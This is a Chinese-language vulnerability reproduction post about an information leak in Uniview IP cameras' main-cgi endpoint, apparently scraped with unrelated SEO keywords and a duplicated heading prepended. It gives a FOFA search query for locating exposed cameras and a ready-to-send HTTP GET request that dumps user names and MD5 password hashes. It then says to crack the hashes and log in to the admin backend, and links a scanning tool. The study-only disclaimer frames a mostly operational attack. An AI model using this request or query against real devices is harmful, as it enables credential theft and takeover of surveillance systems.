建设一个网站需要多少费用,建设凡科网站,电商货源平台,汕头百度网站排名宇视科技视频监控 main-cgi 文件信息泄露漏洞 一、产品简介二、漏概述三、复现环境四、漏洞检测手工抓包自动化检测 免责声明#xff1a;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失#… 宇视科技视频监控 main-cgi 文件信息泄露漏洞 一、产品简介二、漏概述三、复现环境四、漏洞检测手工抓包自动化检测 免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、产品简介
宇视(Uniview)高清网络摄像机是一种高性能的网络摄像机它可以通过网络进行视频传输和监控。该摄像机采用先进的视频技术具有高清晰度、低照度、宽动态等特点能够提供高质量的视频图像。
二、漏概述
宇视(Uniview)高清网络摄像机存在信息泄露漏洞攻击者可以通过解密泄露信息获取管理员账号密码登陆后台控制整个系统最终导致系统处于极度不安全状态。
三、复现环境 FOFA: app“uniview-视频监控” 四、漏洞检测
POC
GET /cgi-bin/main-cgi?json{cmd:255,szUserName:,u32UserLoginHandle:-1} HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15手工抓包
如果回显200 ok并且能看到有UserName关键字的说明成功 我们也可以看到密码部分是md5加密的需要去解密 直接登录后台 如果你遇到了插件异常
请直接使用IE浏览器访问
自动化检测
小龙POC这里依然还是顶着干 小龙POC开源传送门: 小龙POC工具
小龙POCexe传送门: 小龙POC工具
